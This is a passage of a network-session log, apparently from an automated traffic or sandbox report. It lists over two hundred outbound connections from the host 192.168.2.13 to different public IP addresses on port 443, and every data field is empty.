                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10190192.168.2.1345734120.131.229.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10191192.168.2.134687427.82.126.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192192.168.2.134026432.224.213.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10193192.168.2.1338320178.4.160.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10194192.168.2.1344042168.206.145.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10195192.168.2.1357484219.204.154.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10196192.168.2.133914243.129.59.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10197192.168.2.1339390218.218.59.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10198192.168.2.1352580152.166.137.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10199192.168.2.1338946123.132.89.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10200192.168.2.1333002177.78.237.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10201192.168.2.134316886.44.36.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10202192.168.2.1347734108.131.199.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10203192.168.2.1352832114.74.41.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10204192.168.2.1352752143.186.254.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10205192.168.2.1341698220.31.46.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10206192.168.2.133693693.116.37.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10207192.168.2.135473436.35.243.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10208192.168.2.1354744199.163.200.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10209192.168.2.1337670167.240.83.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10210192.168.2.1344248181.118.210.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10211192.168.2.1343984187.16.115.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10212192.168.2.134230612.215.195.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10213192.168.2.1339390208.208.38.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10214192.168.2.1348476204.204.232.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10215192.168.2.1350856131.139.220.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10216192.168.2.1345588180.116.201.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10217192.168.2.1339308143.129.126.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10218192.168.2.1336120143.53.93.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10219192.168.2.1356136185.213.87.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10220192.168.2.1334004203.246.115.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10221192.168.2.1351854169.77.143.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10222192.168.2.1358328148.35.221.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10223192.168.2.1334456156.215.65.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10224192.168.2.1354602160.224.106.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10225192.168.2.133620658.182.42.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10226192.168.2.1359782171.30.150.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10227192.168.2.1345710211.90.218.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10228192.168.2.1357706153.237.126.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10229192.168.2.1360182117.240.199.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10230192.168.2.1333444147.191.111.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10231192.168.2.135846486.214.24.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10232192.168.2.1348428110.174.253.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10233192.168.2.134261224.157.20.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10234192.168.2.136036846.160.71.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10235192.168.2.1341872124.101.215.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10236192.168.2.134619236.97.255.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10237192.168.2.135508643.75.236.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10238192.168.2.1355150213.188.251.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10239192.168.2.133385024.219.253.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10240192.168.2.1358428193.117.75.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10241192.168.2.1354774126.40.203.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10242192.168.2.1332788170.245.210.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10243192.168.2.135315068.31.117.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10244192.168.2.135593472.116.171.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10245192.168.2.134778064.218.3.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10246192.168.2.1356630223.238.218.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10247192.168.2.135222075.219.156.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10248192.168.2.1341978118.66.121.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10249192.168.2.134334491.176.24.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10250192.168.2.135337631.223.69.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10251192.168.2.135689652.35.166.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10252192.168.2.1340078110.227.221.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10253192.168.2.1358482140.168.133.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10254192.168.2.1349332123.158.192.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10255192.168.2.133520684.221.142.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10256192.168.2.13443149.156.47.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10257192.168.2.1353650160.49.56.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10258192.168.2.1357566166.138.77.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10259192.168.2.1337824186.28.81.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10260192.168.2.1352128183.183.154.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10261192.168.2.1348798145.169.241.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10262192.168.2.1342134145.79.237.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10263192.168.2.1353072148.251.29.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10264192.168.2.1353978191.183.120.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10265192.168.2.1356018173.16.191.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10266192.168.2.1356104198.209.239.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10267192.168.2.135592488.95.224.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10268192.168.2.135382813.127.29.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10269192.168.2.1335026174.56.48.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10270192.168.2.1354086163.46.171.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10271192.168.2.1343508138.232.116.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10272192.168.2.1359718117.44.96.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10273192.168.2.1334656128.27.178.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10274192.168.2.1349846190.127.159.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10275192.168.2.1344218162.186.189.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10276192.168.2.1357672120.146.124.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10277192.168.2.1353806106.47.210.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10278192.168.2.1340600163.35.27.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10279192.168.2.135470661.164.229.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10280192.168.2.1333820211.183.16.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10281192.168.2.1352008139.248.248.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10282192.168.2.135097044.25.244.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10283192.168.2.133756080.244.180.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10284192.168.2.1347452182.254.139.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10285192.168.2.1358484194.0.231.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10286192.168.2.1336472201.3.42.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10287192.168.2.136060246.205.142.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10288192.168.2.133979862.171.210.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10289192.168.2.134387892.248.79.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10290192.168.2.134985034.215.91.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10291192.168.2.1353664143.156.162.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10292192.168.2.13583068.53.134.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10293192.168.2.1336988146.204.215.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10294192.168.2.134955890.12.29.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10295192.168.2.1342540163.155.28.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10296192.168.2.1347942181.119.231.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10297192.168.2.1350316119.100.106.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10298192.168.2.1344348198.252.238.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10299192.168.2.135176866.174.225.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10300192.168.2.133672276.55.178.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10301192.168.2.133757695.251.132.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10302192.168.2.134706863.68.223.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10303192.168.2.1350856157.40.120.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10304192.168.2.134944219.133.45.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10305192.168.2.134949078.151.9.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10306192.168.2.1334868106.66.133.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10307192.168.2.135020892.21.22.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10308192.168.2.1338636166.125.90.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10309192.168.2.135759497.40.172.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10310192.168.2.1352606142.66.205.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10311192.168.2.1341848111.56.173.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10312192.168.2.135499817.251.194.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10313192.168.2.134609219.18.122.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10314192.168.2.135073465.189.161.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10315192.168.2.13439625.60.24.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10316192.168.2.134193689.87.194.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10317192.168.2.1345180132.195.60.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10318192.168.2.1345998128.31.92.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10319192.168.2.1337198198.90.12.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10320192.168.2.1348272173.93.0.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10321192.168.2.1339736175.16.192.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10322192.168.2.133409852.218.140.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10323192.168.2.1334052187.212.174.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10324192.168.2.1360572182.230.25.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10325192.168.2.133660465.131.161.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10326192.168.2.1337262190.112.5.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10327192.168.2.135849074.196.42.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10328192.168.2.134333051.21.114.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10329192.168.2.1338206218.113.89.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10330192.168.2.1348388167.179.14.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10331192.168.2.1343168140.25.162.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10332192.168.2.135953054.75.99.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10333192.168.2.135823895.25.232.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10334192.168.2.1356546213.64.104.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10335192.168.2.1345664107.39.1.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10336192.168.2.1349546212.150.203.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10337192.168.2.1338148124.62.39.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10338192.168.2.135601288.158.44.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10339192.168.2.133763244.219.236.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10340192.168.2.13379542.2.28.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10341192.168.2.1338534196.162.105.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10342192.168.2.1356366199.51.56.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10343192.168.2.135523082.216.132.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10344192.168.2.1359478188.200.52.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10345192.168.2.1344672135.3.205.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10346192.168.2.135911013.241.157.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10347192.168.2.1347974174.66.226.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10348192.168.2.1352796183.168.244.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10349192.168.2.134761273.229.109.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10350192.168.2.1346036111.121.48.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10351192.168.2.1357226101.180.46.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10352192.168.2.1343318130.148.102.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10353192.168.2.1340844192.142.136.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10354192.168.2.1351694126.181.114.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10355192.168.2.1353156146.163.199.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10356192.168.2.1342708199.170.9.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10357192.168.2.134034488.119.201.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10358192.168.2.1333624107.187.153.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10359192.168.2.1345328136.98.14.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10360192.168.2.1360910139.27.107.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10361192.168.2.1341908198.88.131.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10362192.168.2.1339064202.62.197.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10363192.168.2.1348042157.162.197.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10364192.168.2.135822497.128.127.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10365192.168.2.1350932156.106.90.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10366192.168.2.1342436160.195.8.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10367192.168.2.136091646.213.177.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10368192.168.2.1350066165.64.232.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10369192.168.2.1346632128.109.37.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10370192.168.2.1355074100.0.204.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10371192.168.2.1341200105.153.135.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10372192.168.2.13341501.66.26.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10373192.168.2.1359878137.99.171.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10374192.168.2.1353510179.252.119.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10375192.168.2.1353832129.192.31.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10376192.168.2.1336976128.29.178.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10377192.168.2.1336976103.189.236.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10378192.168.2.1344218147.188.4.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10379192.168.2.133626884.46.239.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10380192.168.2.1350662106.239.20.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10381192.168.2.1350528102.195.4.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10382192.168.2.1333168155.113.243.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10383192.168.2.1355520138.133.237.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10384192.168.2.1352014178.121.242.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10385192.168.2.134553687.156.26.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10386192.168.2.134713886.240.212.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10387192.168.2.1350870135.220.125.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10388192.168.2.1355640178.111.234.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10389192.168.2.135975840.100.220.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10390192.168.2.1333496142.220.231.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10391192.168.2.1347626185.18.61.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10392192.168.2.134043059.144.19.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10393192.168.2.133537045.199.224.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10394192.168.2.1350822205.192.31.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10395192.168.2.134994089.174.160.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10396192.168.2.1344672181.83.46.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10397192.168.2.1337540213.125.126.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10398192.168.2.133531637.217.49.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10399192.168.2.135670262.102.132.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10400192.168.2.134477497.60.164.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10401192.168.2.1345854106.29.63.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10402192.168.2.135357835.233.255.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10403192.168.2.134071850.232.241.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10404192.168.2.1345334120.120.252.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10405192.168.2.1360998171.137.61.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10406192.168.2.135658073.143.81.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10407192.168.2.136060291.164.29.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10408192.168.2.1350046207.86.1.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10409192.168.2.134087244.34.254.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10410192.168.2.135106235.153.126.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10411192.168.2.1338508158.105.76.242443
